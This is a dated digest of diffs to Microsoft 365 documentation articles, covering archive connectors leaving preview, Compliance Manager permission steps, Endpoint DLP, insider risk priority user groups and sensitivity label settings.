Updates from: 07/16/2021 03:14:14
Category Microsoft Docs article Related commit history on GitHub Change details
admin Manage Groups https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/create-groups/manage-groups.md
Go to the Microsoft 365 admin center at [https://admin.microsoft.com](https://ad
## Send copies of conversations to group members' inboxes
-When you use the admin center to create a group, by default users do not get copies of group emails and meeting invitations sent to their inboxes. They'll need to go to the group to see conversations and meetings. You can change this setting in the admin center.
+When you use the admin center to create a group, by default users do not get copies of group emails sent to their inboxes though users get copies of group meeting invitations sent to their inboxes. They'll need to go to the group to see conversations. You can change this setting in the admin center.
When you turn this setting on, group members will get a copy of group emails and meeting invitations sent to their Outlook Inbox. They can read and delete this copy of the email and not affect anyone else. In the Group inbox, a copy of the email still exists.
To confirm that the group has been successfully purged, run the *Get-AzureADMSD
[Upgrade distribution lists to Microsoft 365 groups](../manage/upgrade-distribution-lists.md)
-[Manage Microsoft 365 groups with PowerShell](../../enterprise/manage-microsoft-365-groups-with-powershell.md)
+[Manage Microsoft 365 groups with PowerShell](../../enterprise/manage-microsoft-365-groups-with-powershell.md)
compliance Archive 17A 4 Blackberry Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-blackberry-data.md
description: "Learn how to set up and use a 17a-4 BlackBerry DataParser connector to import and archive BlackBerry data in Microsoft 365."
-# Set up a connector to archive BlackBerry data (preview)
+# Set up a connector to archive BlackBerry data
Use the [BlackBerry DataParser](https://www.17a-4.com/BlackBerry-dataparser/) from 17a-4 LLC to import and archive BlackBerry enterprise data to user mailboxes in your Microsoft 365 organization. The DataParser includes a BlackBerry connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The BlackBerry DataParser connector converts BlackBerry data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Bloomberg Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-bloomberg-data.md
description: "Learn how to set up and use a 17a-4 Bloomberg DataParser connector to import and archive Bloomberg data in Microsoft 365."
-# Set up a connector to archive Bloomberg data (preview)
+# Set up a connector to archive Bloomberg data
Use the [Bloomberg DataParser](https://www.17a-4.com/Bloomberg-dataparser/) from 17a-4 LLC to import and archive data from Bloomberg to user mailboxes in your Microsoft 365 organization. The DataParser includes a Bloomberg connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Bloomberg DataParser connector converts Bloomberg data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Cisco Jabber Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-cisco-jabber-data.md
description: "Learn how to set up and use a 17a-4 Cisco Jabber DataParser connector to import and archive Cisco Jabber data in Microsoft 365."
-# Set up a connector to archive Cisco Jabber data (preview)
+# Set up a connector to archive Cisco Jabber data
Use the [Cisco Jabber DataParser](https://www.17a-4.com/jabber-dataparser/) from 17a-4 LLC to import and archive data from Cisco Jabber to user mailboxes in your Microsoft 365 organization. The DataParser includes a Cisco Jabber connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Cisco Jabber DataParser connector converts Cisco Jabber data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Factset Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-factset-data.md
description: "Learn how to set up and use a 17a-4 FactSet DataParser connector to import and archive FactSet data in Microsoft 365."
-# Set up a connector to archive FactSet data (preview)
+# Set up a connector to archive FactSet data
Use the [FactSet DataParser](https://www.17a-4.com/factset-dataparser/) from 17a-4 LLC to import and archive data from the FactSet platform to user mailboxes in your Microsoft 365 organization. The DataParser includes a FactSet connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The FactSet DataParser connector converts FactSet data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Fuze Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-fuze-data.md
description: "Learn how to set up and use a 17a-4 Fuze DataParser connector to import and archive Fuze data in Microsoft 365."
-# Set up a connector to archive Fuze data (preview)
+# Set up a connector to archive Fuze data
Use the [Fuze DataParser](https://www.17a-4.com/fuze-dataparser/) from 17a-4 LLC to import and archive data from Fuze to user mailboxes in your Microsoft 365 organization. The DataParser includes a Fuze connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Fuze DataParser connector converts Fuze data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Fxconnect Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-fxconnect-data.md
description: "Learn how to set up and use a 17a-4 FX Connect DataParser connector to import and archive FX Connect data in Microsoft 365."
-# Set up a connector to archive FX Connect data (preview)
+# Set up a connector to archive data from FX Connect
Use the [FX Connect DataParser](https://www.17a-4.com/dataparser-roadmap/) from 17a-4 LLC to import and archive data from FX Connect to user mailboxes in your Microsoft 365 organization. The DataParser includes a FX Connect connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The FX Connect DataParser connector converts FX Connect data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Ice Im Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-ice-im-data.md
description: "Learn how to set up and use a 17a-4 ICE Connect Chat DataParser connector to import and archive ICE Connect Chat data in Microsoft 365."
-# Set up a connector to archive ICE Connect Chat data (preview)
+# Set up a connector to archive ICE Connect Chat data
Use the [ICE DataParser](https://www.17a-4.com/ice-dataparser/) from 17a-4 LLC to import and archive data from ICE Connect Chat to user mailboxes in your Microsoft 365 organization. The DataParser includes an ICE Chat connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The ICE DataParser connector converts ICE Connect Chat data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Investedge Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-investedge-data.md
description: "Learn how to set up and use a 17a-4 InvestEdge DataParser connector to import and archive InvestEdge data in Microsoft 365."
-# Set up a connector to archive InvestEdge data (preview)
+# Set up a connector to archive InvestEdge data
Use the [InvestEdge DataParser](https://www.17a-4.com/investedge-dataparser/) from 17a-4 LLC to import and archive data from InvestEdge to user mailboxes in your Microsoft 365 organization. The DataParser includes a InvestEdge connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The InvestEdge DataParser connector converts InvestEdge data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Liveperson Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-liveperson-data.md
description: "Learn how to set up and use a 17a-4 LivePerson Conversational Cloud DataParser connector to import and archive LivePerson Conversational Cloud data in Microsoft 365."
-# Set up a connector to archive LivePerson Conversational Cloud data (preview)
+# Set up a connector to archive LivePerson Conversational Cloud data
Use the [LivePerson Conversational Cloud DataParser](https://www.17a-4.com/liveperson-dataparser/) from 17a-4 LLC to import and archive data from LivePerson Conversational Cloud to user mailboxes in your Microsoft 365 organization. The DataParser includes a LivePerson Conversational Cloud connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The LivePerson Conversational Cloud DataParser connector converts data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Quip Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-quip-data.md
description: "Learn how to set up and use a 17a-4 Quip DataParser connector to import and archive Quip data in Microsoft 365."
-# Set up a connector to archive Quip data (preview)
+# Set up a connector to archive Quip data
Use the [Quip DataParser](https://www.17a-4.com/quip-dataparser/) from 17a-4 LLC to import and archive data from Quip to user mailboxes in your Microsoft 365 organization. The DataParser includes a Quip connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Quip DataParser connector converts Quip data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Refinitiv Messenger Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-refinitiv-messenger-data.md
description: "Learn how to set up and use a 17a-4 Refinitiv Eikon Messenger DataParser connector to import and archive Refinitiv Eikon Messenger data in Microsoft 365."
-# Set up a connector to archive Refinitiv Eikon Messenger data (preview)
+# Set up a connector to archive Refinitiv Eikon Messenger data
Use the [Refinitiv Eikon Messenger DataParser](https://www.17a-4.com/refinitiv-messenger-dataparser/) from 17a-4 LLC to import and archive data from Refinitiv Eikon Messenger to user mailboxes in your Microsoft 365 organization. The DataParser includes a Refinitiv Eikon Messenger connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Refinitiv Eikon Messenger DataParser connector converts Refinitiv Eikon Messenger data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Servicenow Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-servicenow-data.md
description: "Learn how to set up and use a 17a-4 ServiceNow DataParser connector to import and archive ServiceNow data in Microsoft 365."
-# Set up a connector to archive ServiceNow data (preview)
+# Set up a connector to archive data from ServiceNow
Use the [ServiceNow DataParser](https://www.17a-4.com/dataparser/) from 17a-4 LLC to import and archive data from ServiceNow to user mailboxes in your Microsoft 365 organization. The DataParser includes a ServiceNow connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The ServiceNow DataParser connector converts ServiceNow data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Slack Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-slack-data.md
description: "Learn how to set up and use a 17a-4 Slack DataParser connector to import and archive Slack data in Microsoft 365."
-# Set up a connector to archive Slack data (preview)
+# Set up a connector to archive Slack data
Use [DataParser from 17a-4 LLC](https://www.17a-4.com/slack-dataparser/) to import and archive data from the Slack platform to user mailboxes in your Microsoft 365 organization. DataParser includes a Slack connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Slack DataParser connector converts Slack data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Sql Database Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-sql-database-data.md
description: "Learn how to set up and use a 17a-4 SQL DataParser connector to import and archive SQL data in Microsoft 365."
-# Set up a connector to archive SQL data (preview)
+# Set up a connector to archive SQL data
Use the [SQL DataParser](https://www.17a-4.com/sql-dataparser/) from 17a-4 LLC to import and archive data from a SQL database to user mailboxes in your Microsoft 365 organization. The DataParser includes a SQL connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The SQL DataParser connector converts SQL data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Symphony Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-symphony-data.md
description: "Learn how to set up and use a 17a-4 Symphony DataParser connector to import and archive Symphony data in Microsoft 365."
-# Set up a connector to archive Symphony data (preview)
+# Set up a connector to archive data from Symphony
Use the [Symphony DataParser](https://www.17a-4.com/Symphony-dataparser/) from 17a-4 LLC to import and archive Symphony communications data to user mailboxes in your Microsoft 365 organization. The DataParser includes a Symphony connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Symphony DataParser connector converts Symphony data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Webex Teams Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-webex-teams-data.md
description: "Learn how to set up and use a 17a-4 Cisco Webex DataParser connector to import and archive Cisco Webex data in Microsoft 365."
-# Set up a connector to archive Cisco Webex data (preview)
+# Set up a connector to archive Cisco Webex data
Use the [Cisco Webex DataParser](https://www.17a-4.com/webex-dataparser/) from 17a-4 LLC to import and archive data from the Cisco Cisco Webex platform to user mailboxes in your Microsoft 365 organization. The DataParser includes a Cisco Webex connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Cisco Webex DataParser connector converts Cisco Webex data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Zoom Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-zoom-data.md
description: "Learn how to set up and use a 17a-4 Zoom DataParser connector to import and archive Zoom data in Microsoft 365."
-# Set up a connector to archive Zoom data (preview)
+# Set up a connector to archive Zoom data
Use the [Zoom DataParser](https://www.17a-4.com/dataparser/) from 17a-4 LLC to import and archive data from the Zoom platform to user mailboxes in your Microsoft 365 organization. The DataParser includes a Zoom connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Zoom DataParser connector converts Zoom data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive Data From Celltrustsl2 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-data-from-celltrustsl2.md
description: "Learn how to set up and use a CellTrust SL2 data connector to impo
-# Archive data from CellTrust SL2 to Microsoft 365 (preview)
+# Archive data from CellTrust SL2 to Microsoft 365
CellTrust SL2 captures mobile communications data and integrates with the leading archiving technologies to meet the electronic discovery requirements for regulations such as FINRA, HIPAA, FOIA, and TCPA. The SL2 Data Connector imports mobile communication items to Microsoft 365. This article describes the process for integrating SL2 with Microsoft 365 by using the CellTrust SL2 Data Connector for archiving. Completing this process assumes that you have subscribed to CellTrust SL2 service and are familiar with the SL2 architecture. For information about SL2, see <www.celltrust.com>.
compliance Compliance Manager Setup https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/compliance-manager-setup.md
Compliance Manager uses a role-based access control (RBAC) permission model. Onl
### Where to set permissions
-The person holding the global admin role for your organization can set user permissions for Compliance Manager. Permissions can be set in the Office 365 Security & Compliance center as well as in Azure Active Directory (Azure AD).
+The person holding the global admin role for your organization can set user permissions for Compliance Manager. Permissions can be set in the Microsoft 365 compliance center as well as in Azure Active Directory (Azure AD).
> [!NOTE] > Customers in US Government Community (GCC) High and Department of Defense (DoD) environments can only set user permissions and roles for Compliance Manager in Azure AD. See below for Azure AD instructions and role type definitions.
-To set permissions and assign roles in the Office 365 Security & Compliance center, follow the steps below:
+To set permissions and assign roles in the Microsoft 365 compliance center, follow the steps below:
-1. Go to the [Office 365 Security & Compliance Center](https://protection.office.com/) and select **Permissions** on the left navigation.
+1. Go to the [Microsoft 365 compliance center](https://compliance.microsoft.com/compliancemanager) and select **Permissions** on the left navigation.
-2. Find the role group to which you want to add one or more users, and check the box to the left of the group name. (See the [list of roles and related functions below](#role-types). The role group names mimic the role name.)
+2. Under the **Compliance center** dropdown, select **Roles**.
-3. On the flyout pane for that group, select **Edit** under the **Members** header.
+3. Find the role group to which you want to add one or more users, and check the box to the left of the group name. (See the [list of roles and related functions below](#role-types). The role group names mimic the role name.)
-4. Select **Choose members**. Another flyout window will appear.
+4. On the flyout pane for that group, select **Edit** under the **Members** header.
-5. Select **+ Add** to choose one or more users to add to the group.
+5. Select **Choose members**. Another flyout window will appear.
-6. Select the checkbox next to the names you want to add, then select the **Add** button at the bottom.
+6. Select **+ Add** to choose one or more users to add to the group.
-7. When youΓÇÖre done assigning users, select **Done**, then select **Save**, then **Close**.
+7. Select the checkbox next to the names you want to add, then select the **Add** button at the bottom.
-##### More about the Office 365 Security & Compliance Center
+8. When youΓÇÖre done assigning users, select **Done**, then select **Save**, then **Close**.
-Learn more about [permissions in the Office 365 Security & Compliance Center](../security/office-365-security/permissions-in-the-security-and-compliance-center.md).
-
-If you don't have access to the Office 365 Security and Compliance Center, or if you need to access the classic version of Compliance Manager in the Microsoft Service Trust Portal, the Admin settings in the Service Trust Portal provides another way to assign roles ([view instructions](meet-data-protection-and-regulatory-reqs-using-microsoft-cloud.md#assigning-compliance-manager-roles-to-users)). Be aware that such roles are more limited in their functionality.
+If you need to access the classic version of Compliance Manager in the Microsoft Service Trust Portal, the Admin settings in the Service Trust Portal provides another way to assign roles ([view instructions](meet-data-protection-and-regulatory-reqs-using-microsoft-cloud.md#assigning-compliance-manager-roles-to-users)). Be aware that such roles are more limited in their functionality.
##### More about Azure AD
You can reassign improvement actions from one user to another. When you reassign
8. When the reassignment is complete, youΓÇÖll see a confirmation message in the flyout pane confirming that all improvement actions from the previous user have been reassigned to the new user. If you receive a reassignment failure notice, close the window and try again. To close the flyout pane, select **Done**. The new assignee receives an email that they've been assigned to an improvement action. The email contains a direct link into the improvement action's details page.
-
+ > [!NOTE] > If you reassign an action that has a pending update, the direct link to the action in the reassignment email will break if the update is accepted after reassignment. You can fix this by re-assigning the action to the user after the update is accepted. Learn more about [updates to improvement actions](compliance-manager-improvement-actions.md#accepting-updates-to-improvement-actions).
To delete a userΓÇÖs history, follow the steps below:
The Compliance Manager dashboard is designed to provide you an at-a-glance view of your current compliance posture.
-![Compliance Manager - dashboard](../media/compliance-manager-dashboard.png "Compliance Manager dashboard")
### Overall compliance score
compliance Configure Search And Analytics Settings In Advanced Ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/configure-search-and-analytics-settings-in-advanced-ediscovery.md
This query basically filters out duplicate items from the review set. This lets
## Ignore text
-There are situations where certain text will diminish the quality of analytics, such as lengthy disclaimers that get added to email messages regardless of the content of the email. If you know of text that should be ignored, you can exclude it from analytics by specifying the text string and the analytics functionality (Near-duplicates, Email threading, Themes, and Relevance) that the text should be excluded for. Using regular expressions (RegEx) as ignored text is also supported.
+There are situations where certain text will diminish the quality of analytics, such as lengthy disclaimers that get added to email messages regardless of the content of the email. If you know of text that should be ignored, you can exclude it from analytics by specifying the text string and the analytics functionality (Near-duplicates, Email threading, Themes, and Relevance) that the text should be excluded for. Using regular expressions (RegEx) as ignored text is also supported.
## Optical character recognition (OCR) When this setting is turned on, OCR processing will be run on image files. OCR processing is run in the following situations: -- When custodians and [non-custodial data sources](non-custodial-data-sources.md) are added to a case. OCR processing is performed during the [Advanced indexing](indexing-custodian-data.md) process. OCR is only run on items that are processed during Advanced indexing. For example, if a large PDF file that is partially indexed or had other indexing errors is processed during Advanced indexing, the file will also have OCR applied. In other words, OCR processing only occurs on files that are re-indexed during the Advanced indexing process. This means are will situations that when custodians are added to a case, some email attachments won't be processed for OCR because those files are not processed during Advanced indexing. When OCR is applied image files, the text in those image files will be searchable during a collection.
+- When custodians and [non-custodial data sources](non-custodial-data-sources.md) are added to a case. When OCR is applied to image files, the text in those files will be searchable during a collection. OCR processing is performed during the [Advanced indexing](indexing-custodian-data.md) process. OCR is only run on items that are processed during Advanced indexing. For example, if a large PDF file that is partially indexed or had other indexing errors is processed during Advanced indexing, the file will also have OCR applied. In other words, OCR processing only occurs on files that are re-indexed during the Advanced indexing process. This means there may be situations where custodians are added to a case but some email attachments won't be processed for OCR because those files are not processed during Advanced indexing.
- When content from other data sources (that aren't associated with a custodian and added to the case in a non-custodial data source) is added to a review set.
compliance Endpoint Dlp Learn About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/endpoint-dlp-learn-about.md
Microsoft Endpoint DLP enables you to audit and manage the following types of ac
## Monitored files
-Endpoint DLP supports monitoring of these file types:
+Endpoint DLP supports monitoring of these file types. DLP audits the activities for these file types, even if there isn't a policy match.
- Word files - PowerPoint files
Endpoint DLP supports monitoring of these file types:
- .cs files - .h files - .java files
+
+If you only want monitoring data from policy matches, you can turn off the **Always audit file activity for devices** in the endpoint DLP global settings.
-By default, endpoint DLP audits the activities for these file types, even if there isn't a policy match. If you only want monitoring data from policy matches, you can turn off the **Always audit file activity for devices** in the endpoint DLP global settings. If this setting is on, activities on any Word, PowerPoint, Excel, PDF, and .csv file are always audited even if the device is not targeted by any policy.
+> [!NOTE]
+> If the **Always audit file activity for devices** setting is on, activities on any Word, PowerPoint, Excel, PDF, and .csv file are always audited even if the device is not targeted by any policy.
Endpoint DLP monitors activity-based on MIME type, so activities will be captured even if the file extension is changed.
compliance Insider Risk Management Settings https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/insider-risk-management-settings.md
Users in your organization may have different levels of risk depending on their
![Insider risk management priority user group settings](../media/insider-risk-settings-priority-users.png)
-For example, you need to protect against data leaks for a highly confidential project where users have access to sensitive information. You choose to create *Confidential Project* *Users* priority user group for users in your organization that work on this project. Using the policy wizard and the *Data leaks by priority users* policy template, you create a new policy and assign the *Confidential Project Users* priority users group to the policy. Activities examined by the policy for members of the *Confidential Project Users* priority user group are more sensitive to risk and activities by these users will be more likely to generate an alert and have alerts with higher severity levels.
+Instead of being open to review by all analysts and investigators, Priority users groups may also need to restrict review activities to specific users or insider risk role groups. You can choose to assign individual users and role groups to review users, alerts, cases, and reports for each priority user group. Priority user groups can have review permissions assigned to the built-in *Insider Risk Management*, *Insider Risk Management Analysts*, and *Insider Risk Management Investigators* role groups, one or more of these role groups, or to a custom selection of users.
+
+For example, you need to protect against data leaks for a highly confidential project where users have access to sensitive information. You choose to create *Confidential Project* *Users* priority user group for users in your organization that work on this project. Additionally, this priority user group should not have users, alerts, cases, and reports associated with group visible to all the default insider risk management admins, analysts, and investigators. In **Settings**, you create the *Confidential Project Users* priority users group and assign two users as reviewer that can view data related to the groups. Using the policy wizard and the *Data leaks by priority users* policy template, you create a new policy and assign the *Confidential Project Users* priority users group to the policy. Activities examined by the policy for members of the *Confidential Project Users* priority user group are more sensitive to risk and activities by these users will be more likely to generate an alert and have alerts with higher severity levels.
### Create a priority user group
To create a new priority user group, you'll use setting controls in the **Inside
Complete the following steps to create a priority user group: 1. In the [Microsoft 365 compliance center](https://compliance.microsoft.com), go to **Insider risk management** and select **Insider risk settings**.
-2. Select the **Priority user groups** tab
-3. On the **Priority user groups** tab, select **Create priority user group** to start the group creation wizard.
-4. On the **Define group** page, complete the following fields:
+2. Select the **Priority user groups (preview)** tab.
+3. On the **Priority user groups (preview)** tab, select **Create priority user group** to start the group creation wizard.
+4. On the **Name and describe** page, complete the following fields:
- **Name (required)**: Enter a friendly name for the priority user group. You can't change the name of the priority user group after you complete the wizard. - **Description (optional)**: Enter a description for the priority user group. 5. Select **Next** to continue. 6. On the **Choose members** page, select **Choose members** to search and select which mail-enabled user accounts are included in the group or select the **Select all** checkbox to add all users in your organization to the group. Select **Add** to continue or **Cancel** to close without adding any users to the group. 7. Select **Next** to continue.
-8. On the **Review** page, review the settings you've chosen for the priority user group. Select **Edit** to change any of the group values or select **Submit** to create and activate the priority user group.
-9. On the confirmation page, select **Done** to exit the wizard.
+8. On the **Choose who can view this group** page, you must define who can review users, alerts, cases, and reports for the priority user group. At least one user or insider risk management role group must be assigned. Select **Choose users and role groups** and select the users or insider risk management role groups you want to assign to the priority user group. Select **Add** to assign the selected users or role groups to the group.
+9. Select Next to continue.
+10. On the **Review** page, review the settings you've chosen for the priority user group. Select the **Edit** links to change any of the group values or select **Submit** to create and activate the priority user group.
+11. On the confirmation page, select **Done** to exit the wizard.
### Update a priority user group
To update an existing priority user group, you'll use setting controls in the **
Complete the following steps to edit a priority user group: 1. In the [Microsoft 365 compliance center](https://compliance.microsoft.com), go to **Insider risk management** and select **Insider risk settings**.
-2. Select the **Priority user groups** tab
+2. Select the **Priority user groups (preview)** tab.
3. Select the priority user group you want to edit and select **Edit group**.
-4. On the **Define group** page, update the Description field if needed. You can't update the name of the priority user group. Select **Next** to continue.
+4. On the **Name and describe** page, update the Description field if needed. You can't update the name of the priority user group. Select **Next** to continue.
5. On the **Choose members** page, add new members to the group using the **Choose members** control. To remove a user from the group, select the 'X' next to the user you wish to remove. Select **Next** to continue.
-6. On the **Review** page, review the update settings you've chosen for the priority user group. Select **Edit** to change any of the group values or select **Submit** to update the priority user group.
-7. On the confirmation page, select **Done** to exit the wizard.
+6. On the **Choose who can view this group** page, add or remove users or role groups that can review users, alerts, cases, and reports for the priority user group.
+7. Select **Next** to continue.
+8. On the **Review** page, review the update settings you've chosen for the priority user group. Select the **Edit** links to change any of the group values or select **Submit** to update the priority user group.
+9. On the confirmation page, select **Done** to exit the wizard.
### Delete a priority user group
To delete an existing priority user group, you'll use setting controls in the **
Complete the following steps to delete a priority user group: 1. In the [Microsoft 365 compliance center](https://compliance.microsoft.com), go to **Insider risk management** and select **Insider risk settings**.
-2. Select the **Priority user groups** tab
+2. Select the **Priority user groups (preview)** tab.
3. Select the priority user group you want to edit and select **Delete** from the dashboard menu. 4. On the **Delete** dialog, select **Yes** to delete the priority user group or select **Cancel** to return to the dashboard.
Customers with Microsoft 365 subscriptions that include insider risk management
The following Power Automate templates are provided to customers to support process automation for insider risk management users and cases: -- **Notify users when they're added to an insider risk policy**: This template is for organizations that have internal policies, privacy, or regulatory requirements that users must be notified when they are subject to insider risk management policies. When this flow is configured and selected for a user in the users page, users and their managers are sent an email message when the user is added to an insider risk management policy. This template also supports updating a SharePoint list hosted on a SharePoint site to help track notification message details like date/time and the message recipient. If you've chosen to anonymize users in **Privacy settings**, flows created from this template will not function as intended so that user privacy is maintained. Power Automate flows using this template are available on the **Users dashboard**.
+- **Notify users when they're added to an insider risk policy**: This template is for organizations that have internal policies, privacy, or regulatory requirements that users must be notified when they are subject to insider risk management policies. When this flow is configured and selected for a user in the **Users** page, users and their managers are sent an email message when the user is added to an insider risk management policy. This template also supports updating a SharePoint list hosted on a SharePoint site to help track notification message details like date/time and the message recipient. If you've chosen to anonymize users in **Privacy settings**, flows created from this template will not function as intended so that user privacy is maintained. Power Automate flows using this template are available on the **Users dashboard**.
- **Request information from HR or business about a user in an insider risk case**: When acting on a case, insider risk analysts and investigators may need to consult with HR or other stakeholders to understand the context of the case activities. When this flow is configured and selected for a case, analysts and investigators send an email message to HR and business stakeholders configured for this flow. Each recipient is sent a message with pre-configured or customizable response options. When recipients select a response option, the response is recorded as a case note and includes recipient and date/time information. If you've chosen to anonymize users in **Privacy settings**, flows created from this template will not function as intended so that user privacy is maintained. Power Automate flows using this template are available on the **Cases dashboard**. - **Notify manager when a user has an insider risk alert**: Some organizations may need to have immediate management notification when a user has an insider risk management alert. When this flow is configured and selected, the manager for the case user is sent an email message with the following information about all case alerts: - Applicable policy for the alert
compliance Privacy Management https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/privacy-management.md
In accordance with certain privacy regulations, for example General Data Protect
Privacy management in Microsoft 365 can help you handle these inquiries through the subject rights request solution. It provides automation and workflow capabilities for helping you search for subject data that youΓÇÖve stored in Microsoft 365, review the findings, select the appropriate files, and produce reports. Along the way, you can securely collaborate with other experts in your organization to bring the request to completion.
-Note that this subject rights request solution provides capabilities beyond the original data subject requests (DSR) solution in the compliance center, and there is no connection or sharing of workflows between the two. The legacy DSR page will be retired at a later date.
- To learn more, see [Manage subject rights requests](privacy-management-subject-rights-requests.md). ## How we evaluate your data
compliance Sensitive Information Type Learn About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/sensitive-information-type-learn-about.md
localization_priority: Normal - M365-security-compliance
-description: ""
+description: "This article gives an overview of sensitive information types and how they detect sensitive information like social security, credit card, or bank account numbers to identify sensitive items"
# Learn about sensitive information types
Sensitive information types are pattern-based classifiers. They detect sensitive
## Sensitive information types are used in -- [Data loss prevention policies](dlp-learn-about-dlp.md)
+- [Data loss prevention policies](dlp-learn-about-dlp.md)
- [Sensitivity labels](sensitivity-labels.md) - [Retention labels](retention.md) - [Insider risk management](insider-risk-management.md) - [Communication compliance](communication-compliance.md) - [Auto-labelling policies](apply-sensitivity-label-automatically.md#how-to-configure-auto-labeling-for-office-apps)
+- [Privacy management (preview)](privacy-management.md)
## Fundamental parts of a sensitive information type
compliance Sensitivity Labels https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/sensitivity-labels.md
When you configure a label policy, you can:
- **Specify a default label** for new documents, unlabeled emails, and new containers (when you've [enabled sensitivity labels for Microsoft Teams, Microsoft 365 groups, and SharePoint sites](sensitivity-labels-teams-groups-sites.md)). You can specify the same label for all three types of items, or different labels. When you specify a default label for documents, the Azure Information Protection unified labeling client also applies this label to existing documents that are unlabeled. Users can always change the default label if it's not the right label for their document or email.
+ > [!IMPORTANT]
+ > When you have [sublabels](#sublabels-grouping-labels), be careful not to configure the parent label as a default label.
+
Consider using a default label to set a base level of protection settings that you want applied to all your content. However, without user training and other controls, this setting can also result in inaccurate labeling. It's usually not a good idea to select a label that applies encryption as a default label to documents. For example, many organizations need to send and share documents with external users who might not have apps that support the encryption or they might not use an account that can be authorized. For more information about this scenario, see [Sharing encrypted documents with external users](sensitivity-labels-office-apps.md#sharing-encrypted-documents-with-external-users). - **Require a justification for changing a label.** If a user tries to remove a label or replace it with a label that has a lower-order number, you can require the user provides a justification to perform this action. For example, a user opens a document labeled Confidential (order number 3) and replaces that label with one named Public (order number 1). For Office apps, this justification prompt is triggered once per app session when you use built-in labeling, and per file when you use the Azure Information Protection unified labeling client. Administrators can read the justification reason along with the label change in [activity explorer](data-classification-activity-explorer.md).
enterprise Microsoft 365 Connectivity Optics https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/microsoft-365-connectivity-optics.md
description: This article contains information about Microsoft 365 Connectivity
# Microsoft 365 Connectivity Optics
-This article is in progress.
+This document describes some of the connectivity optics Microsoft typically collects from customer devices, and describes some of the ways Microsoft uses such data to analyze and optimize service delivery and to assess and ensure the best possible end-user experience.
